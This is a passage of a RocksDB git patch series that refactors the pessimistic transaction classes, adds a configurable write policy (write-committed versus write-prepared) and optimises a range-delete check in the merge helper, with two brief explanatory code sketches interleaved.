env_->ReopenWritableFile(fpath, &wfile, env_options_); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to open blob file for write: %s status: '%s'" @@ -561,7 +556,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } std::unique_ptr fwriter; - fwriter.reset(new WritableFileWriter(std::move(wfile), env_options)); + fwriter.reset(new WritableFileWriter(std::move(wfile), env_options_)); uint64_t boffset = bfile->GetFileSize(); if (debug_level_ >= 2 && boffset) { @@ -1570,6 +1565,8 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { std::pair BlobDBImpl::FsyncFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); + MutexLock l(&write_mutex_); + std::vector> process_files; { ReadLock rl(&mutex_); From 20dc5e74f276bdcb26c44c13bced506a2d920d3f Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 4 Aug 2017 23:57:49 -0700 Subject: [PATCH 080/205] Optimize range-delete aggregator call in merge helper. Summary: In the condition: ``` if (range_del_agg != nullptr && range_del_agg->ShouldDelete( iter->key(), RangeDelAggregator::RangePositioningMode::kForwardTraversal) && filter != CompactionFilter::Decision::kRemoveAndSkipUntil) { ...
From 20dc5e74f276bdcb26c44c13bced506a2d920d3f Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 4 Aug 2017 23:57:49 -0700 Subject: [PATCH 080/205] Optimize range-delete aggregator call in merge helper. Summary: In the condition: ``` if (range_del_agg != nullptr && range_del_agg->ShouldDelete( iter->key(), RangeDelAggregator::RangePositioningMode::kForwardTraversal) && filter != CompactionFilter::Decision::kRemoveAndSkipUntil) { ... } ``` all the work done in `range_del_agg->ShouldDelete` can be wasted when the `filter` value later disqualifies the result. Instead, check the `filter` value before even calling `range_del_agg->ShouldDelete`, which is a much more involved function. Closes https://github.com/facebook/rocksdb/pull/2690 Differential Revision: D5568931 Pulled By: sagar0 fbshipit-source-id: 17512d52360425c7ae9de7675383f5d7bc3dad58 --- db/merge_helper.cc | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/db/merge_helper.cc b/db/merge_helper.cc index 142486e5eb8..625de27c2b5 100644 --- a/db/merge_helper.cc +++ b/db/merge_helper.cc @@ -201,12 +201,11 @@ Status MergeHelper::MergeUntil(InternalIterator* iter, ikey.sequence <= latest_snapshot_ ? CompactionFilter::Decision::kKeep : FilterMerge(orig_ikey.user_key, value_slice); - if (range_del_agg != nullptr && - + if (filter != CompactionFilter::Decision::kRemoveAndSkipUntil && + range_del_agg != nullptr && range_del_agg->ShouldDelete( iter->key(), - RangeDelAggregator::RangePositioningMode::kForwardTraversal) && - filter != CompactionFilter::Decision::kRemoveAndSkipUntil) { + RangeDelAggregator::RangePositioningMode::kForwardTraversal)) { filter = CompactionFilter::Decision::kRemove; } if (filter == CompactionFilter::Decision::kKeep ||
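The win comes purely from &&'s guaranteed left-to-right, short-circuit evaluation: once an operand is false, later operands never run. A generic sketch of the same reordering, with hypothetical names:

```cpp
#include <string>

// Stand-in for range_del_agg->ShouldDelete(): imagine a costly tombstone
// lookup whose result is sometimes discarded.
static bool ExpensiveShouldDelete(const std::string& key) {
  return !key.empty();  // placeholder for the real work
}

static bool ShouldRemove(bool filter_allows_removal, const std::string& key) {
  // Cheap disqualifying checks go first, so the expensive call is skipped
  // whenever its result would be ignored -- the reordering the patch makes.
  return filter_allows_removal && ExpensiveShouldDelete(key);
}
```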
"utilities/transactions/transaction_db_mutex_impl.cc", "utilities/transactions/transaction_impl.cc", "utilities/transactions/transaction_lock_mgr.cc", "utilities/transactions/transaction_util.cc", + "utilities/transactions/write_prepared_transaction_impl.cc", "utilities/ttl/db_ttl_impl.cc", "utilities/write_batch_with_index/write_batch_with_index.cc", "utilities/write_batch_with_index/write_batch_with_index_internal.cc", diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 259f50fe6a6..548518f6008 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -23,6 +23,12 @@ namespace rocksdb { class TransactionDBMutexFactory; +enum TxnDBWritePolicy { + WRITE_COMMITTED = 0, // write only the committed data + WRITE_PREPARED, // write data after the prepare phase of 2pc + WRITE_UNPREPARED // write data before the prepare phase of 2pc +}; + struct TransactionDBOptions { // Specifies the maximum number of keys that can be locked at the same time // per column family. @@ -66,6 +72,12 @@ struct TransactionDBOptions { // condition variable for all transaction locking instead of the default // mutex/condvar implementation. std::shared_ptr custom_mutex_factory; + + // The policy for when to write the data into the DB. The default policy is to + // write only the committed data (WRITE_COMMITTED). The data could be written + // before the commit phase. The DB then needs to provide the mechanisms to + // tell apart committed from uncommitted data. + TxnDBWritePolicy write_policy; }; struct TransactionOptions { diff --git a/src.mk b/src.mk index 0b0d4e6ab51..44c59fea7d4 100644 --- a/src.mk +++ b/src.mk @@ -195,7 +195,7 @@ LIB_SOURCES = \ utilities/transactions/optimistic_transaction_db_impl.cc \ utilities/transactions/optimistic_transaction_impl.cc \ utilities/transactions/transaction_base.cc \ - utilities/transactions/transaction_db_impl.cc \ + utilities/transactions/pessimistic_transaction_db.cc \ utilities/transactions/transaction_db_mutex_impl.cc \ utilities/transactions/transaction_impl.cc \ utilities/transactions/transaction_lock_mgr.cc \ diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/pessimistic_transaction_db.cc similarity index 75% rename from utilities/transactions/transaction_db_impl.cc rename to utilities/transactions/pessimistic_transaction_db.cc index bd43b585ac6..052dc80f730 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -5,7 +5,7 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include #include @@ -21,8 +21,8 @@ namespace rocksdb { -TransactionDBImpl::TransactionDBImpl(DB* db, - const TransactionDBOptions& txn_db_options) +PessimisticTransactionDB::PessimisticTransactionDB( + DB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), db_impl_(static_cast_with_check(db)), txn_db_options_(txn_db_options), @@ -34,9 +34,9 @@ TransactionDBImpl::TransactionDBImpl(DB* db, assert(db_impl_ != nullptr); } -// Support initiliazing TransactionDBImpl from a stackable db +// Support initiliazing PessimisticTransactionDB from a stackable db // -// TransactionDBImpl +// PessimisticTransactionDB // ^ ^ // | | // | + @@ -50,8 +50,8 @@ TransactionDBImpl::TransactionDBImpl(DB* db, // + // DB // -TransactionDBImpl::TransactionDBImpl(StackableDB* db, - const TransactionDBOptions& 
txn_db_options) +PessimisticTransactionDB::PessimisticTransactionDB( + StackableDB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), db_impl_(static_cast_with_check(db->GetRootDB())), txn_db_options_(txn_db_options), @@ -63,13 +63,13 @@ TransactionDBImpl::TransactionDBImpl(StackableDB* db, assert(db_impl_ != nullptr); } -TransactionDBImpl::~TransactionDBImpl() { +PessimisticTransactionDB::~PessimisticTransactionDB() { while (!transactions_.empty()) { delete transactions_.begin()->second; } } -Status TransactionDBImpl::Initialize( +Status PessimisticTransactionDB::Initialize( const std::vector& compaction_enabled_cf_indices, const std::vector& handles) { for (auto cf_ptr : handles) { @@ -121,7 +121,7 @@ Status TransactionDBImpl::Initialize( return s; } -Transaction* TransactionDBImpl::BeginTransaction( +Transaction* WriteCommittedTxnDB::BeginTransaction( const WriteOptions& write_options, const TransactionOptions& txn_options, Transaction* old_txn) { if (old_txn != nullptr) { @@ -132,7 +132,18 @@ Transaction* TransactionDBImpl::BeginTransaction( } } -TransactionDBOptions TransactionDBImpl::ValidateTxnDBOptions( +Transaction* WritePreparedTxnDB::BeginTransaction( + const WriteOptions& write_options, const TransactionOptions& txn_options, + Transaction* old_txn) { + if (old_txn != nullptr) { + ReinitializeTransaction(old_txn, write_options, txn_options); + return old_txn; + } else { + return new WritePreparedTxnImpl(this, write_options, txn_options); + } +} + +TransactionDBOptions PessimisticTransactionDB::ValidateTxnDBOptions( const TransactionDBOptions& txn_db_options) { TransactionDBOptions validated = txn_db_options; @@ -213,8 +224,19 @@ Status TransactionDB::WrapDB( DB* db, const TransactionDBOptions& txn_db_options, const std::vector& compaction_enabled_cf_indices, const std::vector& handles, TransactionDB** dbptr) { - TransactionDBImpl* txn_db = new TransactionDBImpl( - db, TransactionDBImpl::ValidateTxnDBOptions(txn_db_options)); + PessimisticTransactionDB* txn_db; + switch (txn_db_options.write_policy) { + case WRITE_UNPREPARED: + return Status::NotSupported("WRITE_UNPREPARED is not implemented yet"); + case WRITE_PREPARED: + txn_db = new WritePreparedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + break; + case WRITE_COMMITTED: + default: + txn_db = new WriteCommittedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + } *dbptr = txn_db; Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles); return s; @@ -227,8 +249,19 @@ Status TransactionDB::WrapStackableDB( StackableDB* db, const TransactionDBOptions& txn_db_options, const std::vector& compaction_enabled_cf_indices, const std::vector& handles, TransactionDB** dbptr) { - TransactionDBImpl* txn_db = new TransactionDBImpl( - db, TransactionDBImpl::ValidateTxnDBOptions(txn_db_options)); + PessimisticTransactionDB* txn_db; + switch (txn_db_options.write_policy) { + case WRITE_UNPREPARED: + return Status::NotSupported("WRITE_UNPREPARED is not implemented yet"); + case WRITE_PREPARED: + txn_db = new WritePreparedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + break; + case WRITE_COMMITTED: + default: + txn_db = new WriteCommittedTxnDB( + db, PessimisticTransactionDB::ValidateTxnDBOptions(txn_db_options)); + } *dbptr = txn_db; Status s = txn_db->Initialize(compaction_enabled_cf_indices, handles); return s; @@ -236,11 +269,12 @@ Status TransactionDB::WrapStackableDB( // Let TransactionLockMgr know that this column 
family exists so it can // allocate a LockMap for it. -void TransactionDBImpl::AddColumnFamily(const ColumnFamilyHandle* handle) { +void PessimisticTransactionDB::AddColumnFamily( + const ColumnFamilyHandle* handle) { lock_mgr_.AddColumnFamily(handle->GetID()); } -Status TransactionDBImpl::CreateColumnFamily( +Status PessimisticTransactionDB::CreateColumnFamily( const ColumnFamilyOptions& options, const std::string& column_family_name, ColumnFamilyHandle** handle) { InstrumentedMutexLock l(&column_family_mutex_); @@ -255,7 +289,8 @@ Status TransactionDBImpl::CreateColumnFamily( // Let TransactionLockMgr know that it can deallocate the LockMap for this // column family. -Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { +Status PessimisticTransactionDB::DropColumnFamily( + ColumnFamilyHandle* column_family) { InstrumentedMutexLock l(&column_family_mutex_); Status s = db_->DropColumnFamily(column_family); @@ -266,23 +301,24 @@ Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { return s; } -Status TransactionDBImpl::TryLock(PessimisticTxn* txn, uint32_t cfh_id, - const std::string& key, bool exclusive) { +Status PessimisticTransactionDB::TryLock(PessimisticTxn* txn, uint32_t cfh_id, + const std::string& key, + bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void TransactionDBImpl::UnLock(PessimisticTxn* txn, - const TransactionKeyMap* keys) { +void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, + const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void TransactionDBImpl::UnLock(PessimisticTxn* txn, uint32_t cfh_id, - const std::string& key) { +void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, uint32_t cfh_id, + const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } // Used when wrapping DB write operations in a transaction -Transaction* TransactionDBImpl::BeginInternalTransaction( +Transaction* PessimisticTransactionDB::BeginInternalTransaction( const WriteOptions& options) { TransactionOptions txn_options; Transaction* txn = BeginTransaction(options, txn_options, nullptr); @@ -301,9 +337,9 @@ Transaction* TransactionDBImpl::BeginInternalTransaction( // sort its keys before locking them. This guarantees that TransactionDB write // methods cannot deadlock with eachother (but still could deadlock with a // Transaction). 
-Status TransactionDBImpl::Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key, const Slice& val) { +Status PessimisticTransactionDB::Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, const Slice& val) { Status s; Transaction* txn = BeginInternalTransaction(options); @@ -322,9 +358,9 @@ Status TransactionDBImpl::Put(const WriteOptions& options, return s; } -Status TransactionDBImpl::Delete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) { +Status PessimisticTransactionDB::Delete(const WriteOptions& wopts, + ColumnFamilyHandle* column_family, + const Slice& key) { Status s; Transaction* txn = BeginInternalTransaction(wopts); @@ -344,9 +380,9 @@ Status TransactionDBImpl::Delete(const WriteOptions& wopts, return s; } -Status TransactionDBImpl::Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key, const Slice& value) { +Status PessimisticTransactionDB::Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key, const Slice& value) { Status s; Transaction* txn = BeginInternalTransaction(options); @@ -366,7 +402,8 @@ Status TransactionDBImpl::Merge(const WriteOptions& options, return s; } -Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { +Status PessimisticTransactionDB::Write(const WriteOptions& opts, + WriteBatch* updates) { // Need to lock all keys in this batch to prevent write conflicts with // concurrent transactions. Transaction* txn = BeginInternalTransaction(opts); @@ -385,19 +422,19 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { return s; } -void TransactionDBImpl::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTxn* tx) { +void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, + PessimisticTxn* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); } -void TransactionDBImpl::RemoveExpirableTransaction(TransactionID tx_id) { +void PessimisticTransactionDB::RemoveExpirableTransaction(TransactionID tx_id) { std::lock_guard lock(map_mutex_); expirable_transactions_map_.erase(tx_id); } -bool TransactionDBImpl::TryStealingExpiredTransactionLocks( +bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( TransactionID tx_id) { std::lock_guard lock(map_mutex_); @@ -409,7 +446,7 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( return tx.TryStealingLocks(); } -void TransactionDBImpl::ReinitializeTransaction( +void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { auto txn_impl = static_cast_with_check(txn); @@ -417,7 +454,7 @@ void TransactionDBImpl::ReinitializeTransaction( txn_impl->Reinitialize(this, write_options, txn_options); } -Transaction* TransactionDBImpl::GetTransactionByName( +Transaction* PessimisticTransactionDB::GetTransactionByName( const TransactionName& name) { std::lock_guard lock(name_map_mutex_); auto it = transactions_.find(name); @@ -428,7 +465,7 @@ Transaction* TransactionDBImpl::GetTransactionByName( } } -void TransactionDBImpl::GetAllPreparedTransactions( +void PessimisticTransactionDB::GetAllPreparedTransactions( std::vector* transv) { assert(transv); transv->clear(); @@ -440,11 +477,12 @@ void TransactionDBImpl::GetAllPreparedTransactions( } } -TransactionLockMgr::LockStatusData 
TransactionDBImpl::GetLockStatusData() { +TransactionLockMgr::LockStatusData +PessimisticTransactionDB::GetLockStatusData() { return lock_mgr_.GetLockStatusData(); } -void TransactionDBImpl::RegisterTransaction(Transaction* txn) { +void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) { assert(txn); assert(txn->GetName().length() > 0); assert(GetTransactionByName(txn->GetName()) == nullptr); @@ -453,7 +491,7 @@ void TransactionDBImpl::RegisterTransaction(Transaction* txn) { transactions_[txn->GetName()] = txn; } -void TransactionDBImpl::UnregisterTransaction(Transaction* txn) { +void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) { assert(txn); std::lock_guard lock(name_map_mutex_); auto it = transactions_.find(txn->GetName()); diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/pessimistic_transaction_db.h similarity index 67% rename from utilities/transactions/transaction_db_impl.h rename to utilities/transactions/pessimistic_transaction_db.h index dfc13fbd707..d9cf7d55867 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -17,25 +17,26 @@ #include "rocksdb/utilities/transaction_db.h" #include "utilities/transactions/transaction_impl.h" #include "utilities/transactions/transaction_lock_mgr.h" +#include "utilities/transactions/write_prepared_transaction_impl.h" namespace rocksdb { -class TransactionDBImpl : public TransactionDB { +class PessimisticTransactionDB : public TransactionDB { public: - explicit TransactionDBImpl(DB* db, - const TransactionDBOptions& txn_db_options); + explicit PessimisticTransactionDB(DB* db, + const TransactionDBOptions& txn_db_options); - explicit TransactionDBImpl(StackableDB* db, - const TransactionDBOptions& txn_db_options); + explicit PessimisticTransactionDB(StackableDB* db, + const TransactionDBOptions& txn_db_options); - ~TransactionDBImpl(); + virtual ~PessimisticTransactionDB(); Status Initialize(const std::vector& compaction_enabled_cf_indices, const std::vector& handles); Transaction* BeginTransaction(const WriteOptions& write_options, const TransactionOptions& txn_options, - Transaction* old_txn) override; + Transaction* old_txn) override = 0; using StackableDB::Put; virtual Status Put(const WriteOptions& options, @@ -97,11 +98,12 @@ class TransactionDBImpl : public TransactionDB { TransactionLockMgr::LockStatusData GetLockStatusData() override; - private: + protected: void ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options = TransactionOptions()); + private: DBImpl* db_impl_; const TransactionDBOptions txn_db_options_; TransactionLockMgr lock_mgr_; @@ -122,5 +124,44 @@ class TransactionDBImpl : public TransactionDB { std::unordered_map transactions_; }; +// A PessimisticTransactionDB that writes the data to the DB after the commit. +// In this way the DB only contains the committed data. 
+class WriteCommittedTxnDB : public PessimisticTransactionDB { + public: + explicit WriteCommittedTxnDB(DB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + explicit WriteCommittedTxnDB(StackableDB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + virtual ~WriteCommittedTxnDB() {} + + Transaction* BeginTransaction(const WriteOptions& write_options, + const TransactionOptions& txn_options, + Transaction* old_txn) override; +}; + +// A PessimisticTransactionDB that writes data to DB after prepare phase of 2PC. +// In this way some data in the DB might not be committed. The DB provides +// mechanisms to tell such data apart from committed data. +class WritePreparedTxnDB : public PessimisticTransactionDB { + public: + explicit WritePreparedTxnDB(DB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + explicit WritePreparedTxnDB(StackableDB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + virtual ~WritePreparedTxnDB() {} + + Transaction* BeginTransaction(const WriteOptions& write_options, + const TransactionOptions& txn_options, + Transaction* old_txn) override; +}; + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index ececec6d534..a2219e1a381 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -22,7 +22,7 @@ #include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { @@ -48,7 +48,7 @@ PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, deadlock_detect_(false), deadlock_detect_depth_(0) { txn_db_impl_ = - static_cast_with_check(txn_db); + static_cast_with_check(txn_db); db_impl_ = static_cast_with_check(db_); Initialize(txn_options); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 8445b0a50ab..dce5c7b97e4 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -30,7 +30,7 @@ namespace rocksdb { -class TransactionDBImpl; +class PessimisticTransactionDB; class PessimisticTxn; // A transaction under pessimistic concurrency control. 
This class implements @@ -121,7 +121,7 @@ class PessimisticTxn : public TransactionBaseImpl { void Clear() override; - TransactionDBImpl* txn_db_impl_; + PessimisticTransactionDB* txn_db_impl_; DBImpl* db_impl_; // If non-zero, this transaction should not be committed after this time (in diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 99e71eeb0de..95612cd3974 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -26,7 +26,7 @@ #include "util/murmurhash.h" #include "util/sync_point.h" #include "util/thread_local.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" namespace rocksdb { @@ -115,7 +115,7 @@ TransactionLockMgr::TransactionLockMgr( mutex_factory_(mutex_factory) { assert(txn_db); txn_db_impl_ = - static_cast_with_check(txn_db); + static_cast_with_check(txn_db); } TransactionLockMgr::~TransactionLockMgr() {} diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6c0d1e99dc0..86a65783fdf 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -27,7 +27,7 @@ struct LockMap; struct LockMapStripe; class Slice; -class TransactionDBImpl; +class PessimisticTransactionDB; class TransactionLockMgr { public: @@ -61,7 +61,7 @@ class TransactionLockMgr { LockStatusData GetLockStatusData(); private: - TransactionDBImpl* txn_db_impl_; + PessimisticTransactionDB* txn_db_impl_; // Default number of lock map stripes per column family const size_t default_num_stripes_; diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_transaction_impl.cc index ded6bcb2bc6..c018e946047 100644 --- a/utilities/transactions/write_prepared_transaction_impl.cc +++ b/utilities/transactions/write_prepared_transaction_impl.cc @@ -21,7 +21,7 @@ #include "rocksdb/utilities/transaction_db.h" #include "util/string_util.h" #include "util/sync_point.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/transaction_impl.h" #include "utilities/transactions/transaction_util.h" From 4ca11b4b07ed7e108749f7dd8ddf037c641c3d58 Mon Sep 17 00:00:00 2001 From: janlzlabs Date: Sun, 6 Aug 2017 12:43:34 -0700 Subject: [PATCH 082/205] Update USERS.md Summary: I'd like to propose adding my company as a RocksDB user Closes https://github.com/facebook/rocksdb/pull/2694 Differential Revision: D5572113 Pulled By: ajkr fbshipit-source-id: 646143b955e3efddee56691cce912d7badaa6e8b --- USERS.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/USERS.md b/USERS.md index 37d33b436a3..7be093f9582 100644 --- a/USERS.md +++ b/USERS.md @@ -80,3 +80,6 @@ quasardb uses a heavily tuned RocksDB as its persistence layer. ## 360 Pika [360](http://www.360.cn/) [Pika](https://github.com/Qihoo360/pika) is a nosql compatible with redis. With the huge amount of data stored, redis may suffer for a capacity bottleneck, and pika was born for solving it. It has widely been widely used in many company + +## LzLabs +LzLabs is using RocksDB as a storage engine in their multi-database distributed framework to store application configuration and user data. 
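Patch 081 above made write_policy user-selectable, and the valgrind fix that follows gives it a default value. A minimal sketch of selecting the policy when opening a TransactionDB, assuming a placeholder path; at this point WRITE_COMMITTED is the only fully implemented policy, and WrapDB rejects WRITE_UNPREPARED with NotSupported:

```cpp
#include <cassert>

#include "rocksdb/utilities/transaction_db.h"

int main() {
  rocksdb::Options options;
  options.create_if_missing = true;

  rocksdb::TransactionDBOptions txn_db_options;
  // Request the classic policy explicitly: data reaches the DB only at
  // commit time, so the DB never contains uncommitted keys.
  txn_db_options.write_policy = rocksdb::WRITE_COMMITTED;

  rocksdb::TransactionDB* db = nullptr;
  rocksdb::Status s = rocksdb::TransactionDB::Open(
      options, txn_db_options, "/tmp/txn_example" /* placeholder */, &db);
  assert(s.ok());
  delete db;
  return 0;
}
```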
From a9a4e89c386495d65e2afee33dcba6b09f072fe7 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 7 Aug 2017 08:27:49 -0700 Subject: [PATCH 083/205] Fix valgrind complaint about initialization Summary: Closes https://github.com/facebook/rocksdb/pull/2697 Differential Revision: D5573894 Pulled By: maysamyabandeh fbshipit-source-id: 8fc03ea8ea6f3f3bc0f68b64cf90243a70562dc4 --- include/rocksdb/utilities/transaction_db.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 548518f6008..a61234adcc2 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -77,7 +77,7 @@ struct TransactionDBOptions { // write only the committed data (WRITE_COMMITTED). The data could be written // before the commit phase. The DB then needs to provide the mechanisms to // tell apart committed from uncommitted data. - TxnDBWritePolicy write_policy; + TxnDBWritePolicy write_policy = TxnDBWritePolicy::WRITE_COMMITTED; }; struct TransactionOptions { From bdc056f8aa21b3bdae5f91821b273d80627f8392 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 7 Aug 2017 16:07:40 -0700 Subject: [PATCH 084/205] Refactor PessimisticTransaction Summary: This patch splits Commit and Prepare into lock-related logic and db-write-related logic. It moves the lock-related logic to PessimisticTransaction, to be reused by all child classes, and moves the existing db-write-related implementation into PrepareInternal, CommitSingleInternal, and CommitInternal in WriteCommittedTxnImpl. Closes https://github.com/facebook/rocksdb/pull/2691 Differential Revision: D5569464 Pulled By: maysamyabandeh fbshipit-source-id: d1b8698e69801a4126c7bc211745d05c636f5325 --- CMakeLists.txt | 6 +- TARGETS | 6 +- db/db_impl.h | 6 +- src.mk | 6 +- utilities/blob_db/blob_db_impl.cc | 2 +- ...tion_impl.cc => optimistic_transaction.cc} | 26 ++-- ...action_impl.h => optimistic_transaction.h} | 18 +-- .../optimistic_transaction_db_impl.cc | 8 +- ...ion_impl.cc => pessimistic_transaction.cc} | 120 ++++++++++-------- ...ction_impl.h => pessimistic_transaction.h} | 47 ++++--- .../pessimistic_transaction_db.cc | 20 +-- .../transactions/pessimistic_transaction_db.h | 14 +- .../transactions/transaction_lock_mgr.cc | 16 +-- utilities/transactions/transaction_lock_mgr.h | 18 +-- ...nsaction_impl.cc => write_prepared_txn.cc} | 32 +++-- ...ransaction_impl.h => write_prepared_txn.h} | 24 ++-- 16 files changed, 197 insertions(+), 172 deletions(-) rename utilities/transactions/{optimistic_transaction_impl.cc => optimistic_transaction.cc} (83%) rename utilities/transactions/{optimistic_transaction_impl.h => optimistic_transaction.h} (82%) rename utilities/transactions/{transaction_impl.cc => pessimistic_transaction.cc} (82%) rename utilities/transactions/{transaction_impl.h => pessimistic_transaction.h} (86%) rename utilities/transactions/{write_prepared_transaction_impl.cc => write_prepared_txn.cc} (63%) rename utilities/transactions/{write_prepared_transaction_impl.h => write_prepared_txn.h} (77%) diff --git a/CMakeLists.txt b/CMakeLists.txt index 8209f30fe91..b4b568b74be 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -518,14 +518,14 @@ set(SOURCES utilities/spatialdb/spatial_db.cc utilities/table_properties_collectors/compact_on_deletion_collector.cc utilities/transactions/optimistic_transaction_db_impl.cc - utilities/transactions/optimistic_transaction_impl.cc + utilities/transactions/optimistic_transaction.cc
utilities/transactions/transaction_base.cc utilities/transactions/pessimistic_transaction_db.cc utilities/transactions/transaction_db_mutex_impl.cc - utilities/transactions/transaction_impl.cc + utilities/transactions/pessimistic_transaction.cc utilities/transactions/transaction_lock_mgr.cc utilities/transactions/transaction_util.cc - utilities/transactions/write_prepared_transaction_impl.cc + utilities/transactions/write_prepared_txn.cc utilities/ttl/db_ttl_impl.cc utilities/write_batch_with_index/write_batch_with_index.cc utilities/write_batch_with_index/write_batch_with_index_internal.cc diff --git a/TARGETS b/TARGETS index e52f507074f..dcf2729e7bd 100644 --- a/TARGETS +++ b/TARGETS @@ -245,14 +245,14 @@ cpp_library( "utilities/spatialdb/spatial_db.cc", "utilities/table_properties_collectors/compact_on_deletion_collector.cc", "utilities/transactions/optimistic_transaction_db_impl.cc", - "utilities/transactions/optimistic_transaction_impl.cc", + "utilities/transactions/optimistic_transaction.cc", "utilities/transactions/transaction_base.cc", "utilities/transactions/pessimistic_transaction_db.cc", "utilities/transactions/transaction_db_mutex_impl.cc", - "utilities/transactions/transaction_impl.cc", + "utilities/transactions/pessimistic_transaction.cc", "utilities/transactions/transaction_lock_mgr.cc", "utilities/transactions/transaction_util.cc", - "utilities/transactions/write_prepared_transaction_impl.cc", + "utilities/transactions/write_prepared_txn.cc", "utilities/ttl/db_ttl_impl.cc", "utilities/write_batch_with_index/write_batch_with_index.cc", "utilities/write_batch_with_index/write_batch_with_index_internal.cc", diff --git a/db/db_impl.h b/db/db_impl.h index d89ea50cad8..d057f934524 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -631,9 +631,9 @@ class DBImpl : public DB { private: friend class DB; friend class InternalStats; - friend class PessimisticTxn; - friend class WriteCommittedTxnImpl; - friend class WritePreparedTxnImpl; + friend class PessimisticTransaction; + friend class WriteCommittedTxn; + friend class WritePreparedTxn; #ifndef ROCKSDB_LITE friend class ForwardIterator; #endif diff --git a/src.mk b/src.mk index 44c59fea7d4..30012d11f56 100644 --- a/src.mk +++ b/src.mk @@ -193,14 +193,14 @@ LIB_SOURCES = \ utilities/spatialdb/spatial_db.cc \ utilities/table_properties_collectors/compact_on_deletion_collector.cc \ utilities/transactions/optimistic_transaction_db_impl.cc \ - 